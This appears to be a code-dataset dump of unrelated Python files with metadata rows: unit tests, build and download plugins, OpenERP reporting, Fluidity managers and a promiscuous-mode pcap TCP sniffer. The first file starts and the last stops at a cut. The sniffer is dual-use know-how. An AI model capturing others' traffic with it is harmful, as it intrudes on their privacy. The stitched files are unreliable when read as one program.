class TestClsInherit(unittest.TestCase):
"""
Test cases for built-in hooks for
class inheritance
"""
def test_basic(self):
"""
Test Basic Usage for inheritance
"""
class h_test(funhook.Hook):
def __init__(self):
super(h_test, self).__init__()
self.accept_kwargs = False
self.accept_ret = False
def before(self, bnd, n):
return (n+1, )
class cls_p(object):
@funhook.attach_([h_test()])
def func(self, n):
return n + 1
# seek function to wrap with class object
@funhook.setup_([adapt_hook_from(cls_p)])
class cls_chd(cls_p):
def func(self, n):
return n + 100
sc = cls_chd()
self.assertEqual(sc.func(1), 102)
class cls_p1(cls_p):
def func_not_this_one(self):
pass
class cls_p2(cls_p):
def func_not_found(self):
pass
# seek function to wrap with mro
@funhook.setup_([adapt_hook_from()])
class cls_chd_1(cls_p1, cls_p2):
def func(self, n):
return n + 1000
sc = cls_chd_1()
self.assertEqual(sc.func(1), 1002)
self.assertEqual(issubclass(sc.func.__class__, funhook.base._wrapped_fn), True)
self.assertEqual(issubclass(sc.func_not_this_one.__class__, funhook.base._wrapped_fn), False)
self.assertEqual(issubclass(sc.func_not_found.__class__, funhook.base._wrapped_fn), False)
def test_with_hook_init_param(self):
"""
test cases for hooks with init-parameters
"""
class h_dup(funhook.Hook):
def __init__(self, n):
super(h_dup, self).__init__(n)
self.accept_kwargs = False
self.accept_pos_args = True
self.accept_ret = False
self._n = n
def before(self, bnd, n):
return (n+self._n, )
class cls_pp(object):
@funhook.attach_([h_dup(501)])
def func(self, n):
return n+1
class cls_p1(cls_pp):
pass
class cls_p2(cls_pp):
pass
@funhook.setup_([adapt_hook_from()])
class cls_chd(cls_p1, cls_p2):
def func(self, n):
return n-1
self.assertEqual(cls_pp().func(1), 503)
self.assertEqual(cls_chd().func(1), 501) | mit | -7,213,586,287,989,150,000 | 25.45098 | 101 | 0.502039 | false |
rtrouton/Recipes-for-AutoPkg | Shared_Processors/SubDirectoryList.py | 1 | 3324 | #!/usr/bin/python
#
# Copyright 2013 Jesse Peterson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""See docstring for SubDirectoryList class"""
import os
from autopkglib import Processor, ProcessorError
__all__ = ["SubDirectoryList"]
class SubDirectoryList(Processor):
'''Finds a filename for use in other Processors.
Currently only supports glob filename patterns.
'''
input_variables = {
'root_path': {
'description': 'Path to start looking for files.',
'required': True,
},
'suffix_string': {
'description': ("String to append to each found item name in dir."
"Defaults to ','"),
'default': ',',
'required': False,
}
}
output_variables = {
'found_filenames': {
'description': ('String containing a list of all files found '
'relative to root_path, separated by '
'suffix_string.')
},
'found_directories': {
'description': ('String containg a list of all directories '
'found relative to root_path, separated by '
'suffix_string.')
},
'relative_root': {
'description': ('Relative root path')
}
}
description = __doc__
def main(self):
sip_dirs = [
'usr',
'usr/local',
'private',
'private/etc',
'Library'
]
format_string = '%s' % self.env['suffix_string']
# search_string = ' \'{0}\''
search_string = '{0}'
dir_list = list()
file_list = list()
if not os.path.isdir(self.env['root_path']):
raise ProcessorError("Can't find root path!")
for dirName, subdirList, fileList in os.walk(self.env['root_path']):
relative_path = os.path.relpath(dirName, self.env['root_path'])
# We need to remove the SIP folders so Chef doesn't try to create them
if not relative_path == '.' and not (relative_path in sip_dirs):
dir_list.append(relative_path)
# search_string.format(format_string.join(dirName)).strip()
for fname in fileList:
if '.DS_Store' in fname:
continue
# print('\t%s' % fname)
relpath = os.path.relpath(os.path.join(fname, dirName),
self.env['root_path'])
self.output("Relative path: %s" % relpath)
if relpath == ".":
# we want to avoid prepending './' to files at root dir
relpath = ''
# print "Real relative path: %s" % relpath
file_list.append(os.path.join(relpath, fname))
self.env['found_directories'] = search_string.format(
format_string.join(dir_list)).strip()
self.env['found_filenames'] = search_string.format(
format_string.join(file_list)).strip()
if __name__ == '__main__':
PROCESSOR = SubDirectoryList()
PROCESSOR.execute_shell()
| bsd-3-clause | -6,133,843,226,604,085,000 | 32.24 | 76 | 0.610409 | false |
ayiis/python | better_tcp_sniffer.py | 1 | 7186 | # -*- coding:utf-8 -*-
import socket
import struct
import pcap
import traceback
from aytool.common.print_table import PrettyTable
"""
┌──────────────────────────────────┬──────────────────────────────────┬──────────┐
│ Destination Mac │ Source Mac │Ether type│
└──────────────────────────────────┴──────────────────────────────────┴──────────┘
┌──────┬──────┬──────────┬─────────────────────┐ ┌────────────────────────┬──────────────────┐
│ Ver │ IHL │ TOS │ Total length │ │ Source Port │ Destination Port │
├──────┴──────┴──────────┼──────┬──────────────┤ ├────────────────────────┴──────────────────┤
│ Identification │ Flags│FragmentOffset│ │ Sequence Number │
├─────────────┬──────────┼──────┴──────────────┤ ├───────────────────────────────────────────┤
│ TTL │ Protocol │ Header Checksum │ │ Acknowledgement Number │
├─────────────┴──────────┴─────────────────────┤ ├──────┬────────┬────────┬──────────────────┤
│ Source IP │ │ HL │Reserved│ UAPRSF │ Window Size │
├──────────────────────────────────────────────┤ ├──────┴────────┴────────┼──────────────────┤
│ Destination IP │ │ Checksum │ Urgent Pointer │
├──────────────────────────────────────────────┤ ├────────────────────────┴──────────────────┤
│ Options │ │ Options │
└──────────────────────────────────────────────┘ └───────────────────────────────────────────┘
┌─────────┬───────────────────────────────────────────────────────────────────────────────────┐
│ Data Len│ TCP Data│
└─────────┴───────────────────────────────────────────────────────────────────────────────────┘
"""
_eth_addr = lambda a: "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % ((a[0]), (a[1]), (a[2]), (a[3]), (a[4]), (a[5]))
def better_print(packet):
eth_hlen = 14
# IP 头部长度通常是 20 + 可选项
ip_hlen = packet[eth_hlen] << 2 & 0b111100
ip_hdata_raw = packet[eth_hlen: ip_hlen + eth_hlen]
ip_hdata = struct.unpack("!BBHHHBBH4s4s", ip_hdata_raw[:20])
ip_ver = ip_hdata[0] >> 4 # ??
# ip_hlen = ip_hdata[0] << 2 & 0b111100
ip_dlen = ip_hdata[2]
# TCP 头部长度通常是 20 + 可选项
tcp_hlen = packet[eth_hlen + ip_hlen + 2 + 2 + 4 + 4] >> 4 << 2
tcp_hdata_raw = packet[eth_hlen + ip_hlen: eth_hlen + ip_hlen + tcp_hlen]
tcp_hdata = struct.unpack("!HHLLBBHHH", tcp_hdata_raw[:20])
tcp_dlen = ip_dlen - ip_hlen - tcp_hlen
tcp_data = packet[eth_hlen + ip_hlen + tcp_hlen: eth_hlen + ip_dlen]
# ETH
pt = PrettyTable()
pt.add_line((32, 32, 8), [_eth_addr(packet[6:12]), _eth_addr(packet[0:6]), "0x" + packet[12:14].hex()])
# if not(tcp_hdata[0] == 10002 or tcp_hdata[1] == 10002):
# return None
# 右对齐输出
print("\n".join(["%s%s" % (x, y) for x, y in zip([" "] * 3, pt.get_table())]))
# IP
pt1 = PrettyTable()
pt1.add_line((4, 4, 8, 16), [ip_ver, ip_hlen, packet[15:16].hex(), ip_dlen])
pt1.add_line((16, 4, 12), ["0x" + packet[18:20].hex(), format(packet[20] >> 5, "03b"), (packet[20] & 0b0001111) << 4 + packet[21]])
pt1.add_line((8, 8, 16), [ip_hdata[5], ip_hdata[6], hex(ip_hdata[7])])
pt1.add_line((32, ), [socket.inet_ntoa(ip_hdata[8])])
pt1.add_line((32, ), [socket.inet_ntoa(ip_hdata[9])])
pt1.add_line((32, ), [("0x" + ip_hdata_raw[20:].hex()) if ip_hlen > 20 else ""])
packet[14:][12:16]
ip_hdata_raw[16:20]
# TCP
pt2 = PrettyTable()
pt2.add_line((16, 16), [tcp_hdata[0], tcp_hdata[1]])
pt2.add_line((32, ), [tcp_hdata[2]])
pt2.add_line((32, ), [tcp_hdata[3]])
pt2.add_line((4, 6, 6, 16), [tcp_hlen, format(tcp_hdata_raw[2 + 2 + 4 + 4] & 0b1111, "04b") + format(tcp_hdata_raw[2 + 2 + 4 + 4 + 1], "08b")[:2], format(tcp_hdata_raw[2 + 2 + 4 + 4 + 1], "08b")[2:], tcp_hdata[6]])
pt2.add_line((16, 16), [hex(tcp_hdata[7]), tcp_hdata[8]])
pt2.add_line((32, ), [("0x" + tcp_hdata_raw[20:].hex()) if tcp_hlen > 20 else ""])
# 并列输出
print("\n".join(["%s %s" % (x, y) for x, y in zip(pt1.get_table(), pt2.get_table())]))
# DATA
pt3 = PrettyTable()
pt3.add_line((7, 81), [tcp_dlen, tcp_data if tcp_dlen > 0 else ""])
pt3.print_table()
def main():
sniffer = pcap.pcap(name=None, promisc=True, immediate=True, timeout_ms=50)
while True:
try:
ts, packet = next(sniffer, (None, None))
if packet[12:14] == b"\x08\x00" and packet[23:24] == b"\x06": # IP & TCP
better_print(packet)
except Exception:
print(traceback.format_exc())
# #
# TEST #
# #
# Python 3.7 #
# Mac #
if __name__ == "__main__":
main()
| mit | -6,738,308,824,205,303,000 | 42.756522 | 218 | 0.382949 | false |
mariusbaumann/pyload | module/plugins/hoster/FastixRu.py | 1 | 1986 | # -*- coding: utf-8 -*-
import re
from random import randrange
from urllib import unquote
from module.common.json_layer import json_loads
from module.plugins.internal.MultiHoster import MultiHoster, create_getInfo
class FastixRu(MultiHoster):
__name__ = "FastixRu"
__type__ = "hoster"
__version__ = "0.08"
__pattern__ = r'http://(?:www\.)?fastix\.(ru|it)/file/\w{24}'
__description__ = """Fastix hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("Massimo Rosamilia", "[email protected]")]
def getFilename(self, url):
try:
name = unquote(url.rsplit("/", 1)[1])
except IndexError:
name = "Unknown_Filename..."
if name.endswith("..."): # incomplete filename, append random stuff
name += "%s.tmp" % randrange(100, 999)
return name
def setup(self):
self.chunkLimit = 3
def handlePremium(self):
api_key = self.account.getAccountData(self.user)
api_key = api_key['api']
page = self.load("http://fastix.ru/api_v2/",
get={'apikey': api_key, 'sub': "getdirectlink", 'link': self.pyfile.url})
data = json_loads(page)
self.logDebug("Json data", data)
if "error\":true" in page:
self.offline()
else:
self.link = data['downloadlink']
if self.link != self.pyfile.url:
self.logDebug("New URL: %s" % self.link)
if self.pyfile.name.startswith("http") or self.pyfile.name.startswith("Unknown"):
#only use when name wasnt already set
self.pyfile.name = self.getFilename(self.link)
def checkFile(self):
super(FastixRu, self).checkFile()
if self.checkDownload({"error": "<title>An error occurred while processing your request</title>"}) is "error":
self.retry(wait_time=60, reason=_("An error occurred while generating link"))
getInfo = create_getInfo(FastixRu)
| gpl-3.0 | 5,678,757,568,383,446,000 | 28.205882 | 118 | 0.58711 | false |
mlperf/training_results_v0.7 | Fujitsu/benchmarks/resnet/implementations/implementation_open/mxnet/3rdparty/tvm/vta/apps/tsim_example/python/tsim.py | 1 | 1886 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import ctypes
import os.path as osp
from sys import platform
def get_ext():
return ".dylib" if platform == "darwin" else ".so"
def load_dll(dll):
try:
return [ctypes.CDLL(dll, ctypes.RTLD_GLOBAL)]
except OSError:
return []
def load_sw():
cur_path = osp.dirname(osp.abspath(osp.expanduser(__file__)))
sw_libname = "libsw" + get_ext()
sw_lib = osp.join(cur_path, "..", "build", sw_libname)
load_dll(sw_lib)
def init(hw_backend):
"""Init hardware and software shared library for accelerator
Parameters
------------
hw_backend : str
Hardware backend can be verilog or chisel
"""
cur_path = osp.dirname(osp.abspath(osp.expanduser(__file__)))
hw_libname = "libhw" + get_ext()
if hw_backend in ("verilog", "chisel"):
hw_lib = osp.join(cur_path, "..", "hardware", hw_backend, "build", hw_libname)
m = tvm.module.load(hw_lib, "vta-tsim")
load_sw()
f = tvm.get_global_func("tvm.vta.tsim.init")
f(m)
def load_module():
load_sw()
return tvm.get_global_func("tvm.vta.driver")
| apache-2.0 | -4,434,247,329,592,706,000 | 31.517241 | 86 | 0.677094 | false |
youknowone/instantauth | python/instantauthtests/test_coder.py | 1 | 1096 |
import json as json_mod
import pytest
from instantauth.coders import ConstantCoder, PlainCoder
from instantauth.coders.urlquery import URLQueryCoder, SimpleURLQueryCoder
from instantauth.coders.json import JsonCoder
constant = ConstantCoder('encode', 'decode')
plain = PlainCoder()
surlquery = SimpleURLQueryCoder()
json = JsonCoder()
@pytest.mark.parametrize(('coder', 'testcase'), [
(constant, [('decode', 'encode')]),
(plain, [('foo', 'foo')]),
(surlquery, [({'f1': 'v1', 'f2': 'v2'}, 'f1=v1&f2=v2')]),
(json, [({'f1': 'v1', 'i': None}, json_mod.dumps({'f1': 'v1', 'i': None}, separators=(',',':')))]),
])
def test_coder(coder, testcase, secret='SECRET'):
"""Round-trip test"""
for case in testcase:
input = case[0]
if len(case) == 1:
expected = None
elif len(case) == 2:
expected = case[1]
else:
raise Exception
encoded = coder.encode(input)
if expected is not None:
assert expected == encoded
decoded = coder.decode(encoded)
assert input == decoded
| bsd-2-clause | -3,076,262,864,103,504,000 | 29.444444 | 103 | 0.601277 | false |
nerdvegas/rez | src/rez/data/tests/release/build.py | 1 | 1566 | from __future__ import print_function
import shutil
import os.path
import os
import sys
def build(source_path, build_path, install_path, targets):
def _copy(src, dest):
print("copying %s to %s..." % (src, dest))
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(src, dest)
# build
src = os.path.join(source_path, "data")
dest = os.path.join(build_path, "data")
_copy(src, dest)
if "install" not in (targets or []):
return
# install
src = os.path.join(build_path, "data")
dest = os.path.join(install_path, "data")
_copy(src, dest)
if __name__ == '__main__':
build(
source_path=os.environ['REZ_BUILD_SOURCE_PATH'],
build_path=os.environ['REZ_BUILD_PATH'],
install_path=os.environ['REZ_BUILD_INSTALL_PATH'],
targets=sys.argv[1:]
)
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | -7,258,360,811,447,583,000 | 28.54717 | 79 | 0.667944 | false |
zbqf109/goodo | openerp/service/report.py | 1 | 5140 | # -*- coding: utf-8 -*-
import base64
import logging
import sys
import threading
import openerp
import openerp.report
from openerp import tools
from openerp.exceptions import UserError
import security
_logger = logging.getLogger(__name__)
# TODO: set a maximum report number per user to avoid DOS attacks
#
# Report state:
# False -> True
self_reports = {}
self_id = 0
self_id_protect = threading.Semaphore()
def dispatch(method, params):
(db, uid, passwd ) = params[0:3]
threading.current_thread().uid = uid
params = params[3:]
if method not in ['report', 'report_get', 'render_report']:
raise KeyError("Method not supported %s" % method)
security.check(db,uid,passwd)
openerp.modules.registry.RegistryManager.check_registry_signaling(db)
fn = globals()['exp_' + method]
res = fn(db, uid, *params)
openerp.modules.registry.RegistryManager.signal_caches_change(db)
return res
def exp_render_report(db, uid, object, ids, datas=None, context=None):
if not datas:
datas={}
if not context:
context={}
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_reports[id] = {'uid': uid, 'result': False, 'state': False, 'exception': None}
cr = openerp.registry(db).cursor()
try:
result, format = openerp.report.render_report(cr, uid, ids, object, datas, context)
if not result:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException('RML is not available at specified location or not enough data to print!', tb)
self_reports[id]['result'] = result
self_reports[id]['format'] = format
self_reports[id]['state'] = True
except Exception, exception:
_logger.exception('Exception: %s\n', exception)
if hasattr(exception, 'name') and hasattr(exception, 'value'):
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.ustr(exception.name), tools.ustr(exception.value))
else:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.exception_to_unicode(exception), tb)
self_reports[id]['state'] = True
cr.connection.commit()
cr.close()
return _check_report(id)
def exp_report(db, uid, object, ids, datas=None, context=None):
if not datas:
datas={}
if not context:
context={}
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_reports[id] = {'uid': uid, 'result': False, 'state': False, 'exception': None}
def go(id, uid, ids, datas, context):
with openerp.api.Environment.manage():
cr = openerp.registry(db).cursor()
try:
result, format = openerp.report.render_report(cr, uid, ids, object, datas, context)
if not result:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException('RML is not available at specified location or not enough data to print!', tb)
self_reports[id]['result'] = result
self_reports[id]['format'] = format
self_reports[id]['state'] = True
except Exception, exception:
_logger.exception('Exception: %s\n', exception)
if hasattr(exception, 'name') and hasattr(exception, 'value'):
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.ustr(exception.name), tools.ustr(exception.value))
else:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.exception_to_unicode(exception), tb)
self_reports[id]['state'] = True
cr.connection.commit()
cr.close()
return True
threading.Thread(target=go, args=(id, uid, ids, datas, context)).start()
return id
def _check_report(report_id):
result = self_reports[report_id]
exc = result['exception']
if exc:
raise UserError('%s: %s' % (exc.message, exc.traceback))
res = {'state': result['state']}
if res['state']:
if tools.config['reportgz']:
import zlib
res2 = zlib.compress(result['result'])
res['code'] = 'zlib'
else:
#CHECKME: why is this needed???
if isinstance(result['result'], unicode):
res2 = result['result'].encode('latin1', 'replace')
else:
res2 = result['result']
if res2:
res['result'] = base64.encodestring(res2)
res['format'] = result['format']
del self_reports[report_id]
return res
def exp_report_get(db, uid, report_id):
if report_id in self_reports:
if self_reports[report_id]['uid'] == uid:
return _check_report(report_id)
else:
raise Exception, 'AccessDenied'
else:
raise Exception, 'ReportNotFound'
| gpl-3.0 | 5,155,048,508,241,609,000 | 34.205479 | 167 | 0.603307 | false |
energyPATHWAYS/energyPATHWAYS | model_building_tools/create_map_keys_from_drivers/map_key_from_driver.py | 1 | 2834 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 07 19:20:05 2016
@author: ryandrewjones
"""
import sys
import signal
import click
import os
import cPickle as pickle
import energyPATHWAYS.config as cfg
import energyPATHWAYS.util as util
from energyPATHWAYS.pathways_model import PathwaysModel
import energyPATHWAYS.shape as shape
from energyPATHWAYS.outputs import Output
import csv
import time
import datetime
import logging
import cProfile
import traceback
import pandas as pd
# set up a dummy model
path = os.getcwd()
config = 'config.INI'
scenario_id = 1
cfg.initialize_config(path, config, _log_name='log.log')
cfg.primary_geography = 'intersection_id'
model = PathwaysModel(scenario_id, api_run=False)
# model.run(scenario_id, solve_demand=False, solve_supply=False, save_models=False, append_results=False)
demand = model.demand
demand.add_drivers()
existing_geo_map_key_ids, existing_geo_map_key_names = zip(*util.sql_read_table('GeographyMapKeys'))
next_map_key_id = max(existing_geo_map_key_ids)+1
next_geo_map_id = max(util.sql_read_table('GeographyMap', 'id'))+1
###############################################
# user inputs
driver_ids_to_make_map_keys = [
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61]
basis_year_for_map_key = int(cfg.cfgfile.get('case', 'current_year'))
###############################################
# make our new map keys
GeographyMapKeys = [['id', 'name']]
GeographyMap_columns = ['intersection_id', 'geography_map_key_id', 'value', 'id']
GeographyMap = []
for driver_id in driver_ids_to_make_map_keys:
driver = demand.drivers[driver_id]
demand.remap_driver(driver) # remaps to our new super detailed geography
values = util.df_slice(driver.values, basis_year_for_map_key, 'year')
if values.index.nlevels>1:
levels_to_remove = [n for n in values.index.names if n!='intersection_id']
values = util.remove_df_levels(values, levels_to_remove)
new_key_name = driver.name
if new_key_name in existing_geo_map_key_names:
raise ValueError('driver name {} is already in the existing map keys, please rename driver id {}'.format(driver.name, driver.id))
GeographyMapKeys.append([next_map_key_id, new_key_name])
values = values.reset_index()
values['id'] = range(next_geo_map_id, next_geo_map_id+len(values))
values['geography_map_key_id'] = next_map_key_id
GeographyMap.append(values)
next_geo_map_id += len(values)
next_map_key_id+=1
output = pd.concat(GeographyMap)[GeographyMap_columns]
output.to_csv(os.path.join(path, 'outputs', 'GeographyMap.csv'), index=False)
with open(os.path.join(path, 'outputs', 'GeographyMapKeys.csv'), 'wb') as outfile:
csvwriter = csv.writer(outfile, delimiter=',')
for row in GeographyMapKeys:
csvwriter.writerow(row)
| mit | 2,169,229,182,338,889,700 | 25.240741 | 137 | 0.690543 | false |
nitely/ochDownloader | plugins/filefactory_com/anonym_download.py | 1 | 1919 | #python libs
import logging
logger = logging.getLogger(__name__)
#Libs
from addons.captcha.recaptcha import PluginRecaptcha
#CONNECTION_RETRY = 3
BASE_URL = "http://www.filefactory.com"
WAITING = 60
class PluginDownload(PluginRecaptcha):
def parse(self):
link = self.link
page = self.get_page(link)
err_list = ('All free download slots are in use.', )
self.validate(err_list, page)
#
m_pattern = 'check:[^\']+\'(?P<check>[^\']+)'
m = self.get_match(m_pattern, page, "Captcha not found")
c_pattern = 'Recaptcha\.create[^"]+"(?P<key>[^"]+)'
extra_fields = [("check", m.group('check')), ]
self.recaptcha_post_link = "%s/file/checkCaptcha.php" % BASE_URL
page = self.recaptcha(c_pattern, page, extra_fields)
#
m_pattern = '"path":"(?P<path>.*?)"'
m = self.get_match(m_pattern, page, "No path found")
link2 = "%s%s" % (BASE_URL, m.group('path').replace("\\", ""))
page = self.get_page(link2)
#"all slots are taken" may appear here.
cn_pattern = 'countdown">(?P<count>[^<]+)'
self.countdown(cn_pattern, page, 320, WAITING)
#
file_id = self.link.split("/file/")[-1].split("/")[0]
s_pattern = '<a href="(?P<link>[^"]+/%s/[^"]+)' % file_id
#s_pattern = 'id="downloadLinkTarget[^<]+<a href="(?P<link>[^"]+)'
self.source = self.click(s_pattern, page, False)
def recaptcha_success(self, pattern, page):
#overriden
if '"status":"ok"' in page:
return True
else:
return False
if __name__ == "__main__":
import re
page = """<p id="downloadLinkTarget" style="display: none;">
"""
pattern = 'id="downloadLinkTarget.*?<a href="(?P<link>.*?)"'
m = re.search(pattern, page, re.S)
if m is not None:
print m.groups()
else:
print 'not found' | lgpl-3.0 | -5,499,612,315,312,826,000 | 32.684211 | 74 | 0.549766 | false |
yaniv14/OpenCommunity | src/acl/default_roles.py | 1 | 3262 | from django.utils.translation import ugettext_lazy as _
class DefaultRoles(object):
VIEWER = 'viewer'
OBSERVER = 'observer'
PARTICIPANT = 'participant'
PROPOSER = 'proposer'
CONTRIBUTOR = 'contributor'
EDITOR = 'editor'
OPERATOR = 'operator'
DECIDER = 'decider'
MANAGER = 'manager'
choices = (
(VIEWER, _('Viewer')),
(OBSERVER, _('Observer')),
(PARTICIPANT, _('Participant')),
(PROPOSER, _('Proposer')),
(CONTRIBUTOR, _('Contributor')),
(EDITOR, _('Editor')),
(OPERATOR, _('Operator')),
(DECIDER, _('Decider')),
(MANAGER, _('Manager')),
)
permissions = {}
permissions[VIEWER] = [
'access_community',
'access_committee',
'viewclosed_issue',
'viewclosed_proposal',
'view_meeting',
]
permissions[OBSERVER] = permissions[VIEWER] + [
'viewopen_issue',
'viewopen_proposal',
'viewupcoming_community',
'vote',
'proposal_board_vote_self',
'vote_ranking',
]
permissions[PARTICIPANT] = permissions[OBSERVER] + [
'view_proposal_in_discussion',
'viewupcoming_draft',
'view_referendum_results',
'view_update_status',
'view_straw_vote_result',
'view_confidential',
]
permissions[PROPOSER] = permissions[PARTICIPANT] + [
'add_proposal',
]
permissions[CONTRIBUTOR] = permissions[PROPOSER] + [
'add_issue',
]
permissions[EDITOR] = permissions[CONTRIBUTOR] + [
'editopen_issue',
'editopen_proposal',
'edittask_proposal',
]
permissions[OPERATOR] = permissions[CONTRIBUTOR] + [
'add_issuecomment',
'edittask_proposal',
'editupcoming_community',
'editparticipants_community',
'editsummary_community', # ???
'invite_member',
'move_to_referendum',
'proposal_board_vote',
]
permissions[DECIDER] = permissions[OPERATOR] + [
'editopen_issuecomment',
'editagenda_community',
'acceptopen_proposal',
'add_meeting', # == Close Meeting
'edit_referendum',
'chairman_vote',
'show_member_profile',
]
permissions[MANAGER] = permissions[DECIDER] + [
'editopen_issue',
'editclosed_issue',
'editclosed_issuecomment',
'editopen_proposal',
'editclosed_proposal',
'acceptclosed_proposal',
]
class DefaultGroups(object):
MEMBER = "member"
BOARD = "board"
SECRETARY = "secretary"
CHAIRMAN = "chairman"
builtin = {
MEMBER: [DefaultRoles.OBSERVER],
BOARD: [DefaultRoles.PARTICIPANT],
SECRETARY: [DefaultRoles.OPERATOR],
CHAIRMAN: [DefaultRoles.DECIDER, DefaultRoles.EDITOR]
}
permissions = {
k: frozenset(
[p for role in roles for p in DefaultRoles.permissions[role]])
for k, roles in builtin.items()
}
CHOICES = (
(MEMBER, _("member")),
(BOARD, _("board")),
(SECRETARY, _("secretary")),
(CHAIRMAN, _("chairman")),
)
ALL_PERMISSIONS = frozenset(
[p for perms in DefaultGroups.permissions.values() for p in perms])
| bsd-3-clause | -7,700,405,619,576,067,000 | 24.484375 | 74 | 0.568363 | false |
zmsch27/Python | PythonBase/Python_Module.py | 1 | 2415 | #以下来自廖雪峰的Python学习之Python模块
#在计算机程序的开发过程中,随着程序代码越写越多,在一个文件里代码就会越来越长,越来越不容易维护。
#为了编写可维护的代码,我们把很多函数分组,分别放到不同的文件里,这样,每个文件包含的代码就相对较少,很多编程语言都采用这种组织代码的方式。
#在Python中,一个.py文件就称之为一个模块(Module)。
#为了避免模块名冲突,Python又引入了按目录来组织模块的方法,称为包(Package)
#请注意,每一个包目录下面都会有一个__init__.py的文件,这个文件是必须存在的,否则,Python就把这个目录当成普通目录,而不是一个包。
#__init__.py可以是空文件,也可以有Python代码
#使用模块//////////////////////////////////
#!user/nin/env python3
'a test module'
__author__ = 'zmsch27'
import sys
def test():
args = sys.argv
if len(args)==1:
print('Hello World')
elif len(args)==2:
print('Hello %s!' % args[1])
else:
print('To many arguments!')
if __name__=='__main__':
test()
print('-----------------------------------------')
#作用域------------------------------------------
#正常的函数和变量名是公开的(public),可以被直接引用,比如:abc,x123,PI等;
#类似__xxx__这样的变量是特殊变量,可以被直接引用,但是有特殊用途,比如上面的__author__,__name__就是特殊变量
#类似_xxx和__xxx这样的函数或变量就是非公开的(private),不应该被直接引用,比如_abc,__abc等;
#private函数和变量“不应该”被直接引用,而不是“不能”被直接引用,是因为Python并没有一种方法可以完全限制访问private函数或变量。
#但是,从编程习惯上不应该引用private函数或变量。
def _private_1(name):
return 'Hi, %s' % name
def _private_2(name):
return 'Hello, %s' % name
def greating(name):
if len(name)>3:
return _private_1(name)
else:
return _private_2(name)
#在模块里公开greeting()函数,而把内部逻辑用private函数隐藏起来了,这样,调用greeting()函数不用关心内部的private函数细节,这也是一种非常有用的代码封装和抽象的方法
#外部不需要引用的函数全部定义成private,只有外部需要引用的函数才定义为public。 | apache-2.0 | 5,133,151,064,973,818,000 | 29.222222 | 98 | 0.690213 | false |
jensck/fluidity | fluidity/managers.py | 1 | 38146 | #-*- coding:utf-8 -*-
#
# Copyright (C) 2012 - Jens Knutson <jens.knutson at gmail dot com>
# This software is licensed under the GNU General Public License
# version 3 or later (see the file COPYING).
#pylint: disable-msg=W0201
"""Collection of "manager" classes, which handle various aspects of Fluidity."""
from __future__ import absolute_import, division, print_function
__author__ = 'Jens Knutson'
try:
import cPickle as pickle
except ImportError:
import pickle
import datetime
import glob
import json
import operator
import os
import shutil
import subprocess
import time
import gio
import gobject
import pango
import yaml
from kiwi.ui.objectlist import Column
from xdg import BaseDirectory
from fluidity import defs
from fluidity import gee_tee_dee
from fluidity import inbox_items
from fluidity import magic_machine
from fluidity import app_utils
from fluidity.first_time import FirstTimeBot
from fluidity.note import ProjectNote
class DataManager(object):
def __init__(self):
self.pickle_path = defs.USER_DATA_MAIN_FILE
#first, make sure we have our data file - if not, invoke FirstTimeBot
if (not os.path.exists(self.pickle_path) or
not os.path.exists(defs.NOTE_SLIDER_FOLDER)):
bot = FirstTimeBot()
bot.create_initial_files_and_paths()
del(bot) # Thank you for your service, bot. Rest in peace.
try:
with open(self.pickle_path, 'r') as pfile:
self.top_data = pickle.load(pfile)
except EOFError:
# probably the main app in the middle of saving its file.
# Wait a couple seconds, then try again.
time.sleep(2)
# If it _still_ fails, something is really screwed - not
# accommodating this, at least not yet.
with open(self.pickle_path, 'r') as pfile:
self.top_data = pickle.load(pfile)
self.aofs = self.top_data['areas_of_focus']
self.prjs = self.top_data['projects']
self.single_notes = self.top_data['single_notes']
self.queued_singletons = self.top_data['queued_singletons']
self._file_toady = FileSystemManager()
self._magic_maker = magic_machine.MagicMachine()
self.rebuild_aof_cache()
# PUBLIC METHODS
def activate_due_queued(self):
app_utils.log_line("Running activate_due_queued()", datetime.datetime.now())
for p in self.prjs:
prj = self.prjs[p]
if prj.status == "queued":
# FIXME: if the status is queued, we should /always/ have a
# queue date. What's the fallback?
if prj.queue_date:
if datetime.date.today() >= prj.queue_date:
self.change_project_status(prj, "active")
for na in self.queued_singletons:
if na.queue_date <= datetime.date.today():
self.prjs['singletons'].next_actions.append(na)
self.queued_singletons.remove(na)
